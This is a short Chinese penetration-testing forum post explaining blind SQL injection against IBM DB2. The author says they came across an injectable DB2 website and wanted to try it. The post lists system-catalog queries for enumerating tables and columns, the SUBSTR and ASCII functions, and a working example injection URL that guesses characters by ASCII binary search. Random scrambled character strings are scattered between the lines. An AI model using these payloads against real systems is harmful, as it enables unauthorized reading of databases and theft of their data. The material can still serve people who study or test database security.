中国网络渗透测试联盟
标题:
Sql Injection in DB2数据库
[打印本页]
作者:
admin
时间:
2012-9-15 14:06
标题:
Sql Injection in DB2数据库
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
; M' g3 `' i- |& k" E0 @
参考了IBM DB2的文档,总结了这样几条:
( z1 V, Z7 K* G* f3 m& X
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
; T& b2 {, Y3 o4 [" h8 t0 E) Z
可以返回系统中所有用户创建的表(table)名
: p; ^; C" W3 L, w+ Q! J
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''
4 a) E) _( V1 W/ z! L
返回表中的列名
3 W/ M. a/ K% d, k7 {4 c
3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
9 K0 P0 c8 S/ Z4 N
这是最关键的地方,返回第一条记录,类似于sql server中的top 1
7 s @! s9 S% e
4、SUBSTR(string, position, length)
6 e% E8 C0 t! L2 x. _3 F8 C
返回字符串子串的函数,类似于mid
( ~9 T& b8 u( U
5、ASCII()这个就不用多说了。
, f0 F1 ~( @6 ^5 _
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
9 |2 n+ P8 P0 Y$ X3 E0 c
例如判断第一个table的名称的第一个字符的ascii码是否大于50:
1 h; ~" x% B' |4 o
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
$ I3 ~7 \8 i7 f% |, D3 o4 H
0 \* c7 G- [$ n, ~: u$ s3 J
http://blog.waynedeng.com/blogview.asp?logID=543
9 ~9 e4 q* y7 g: K7 ^ P
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2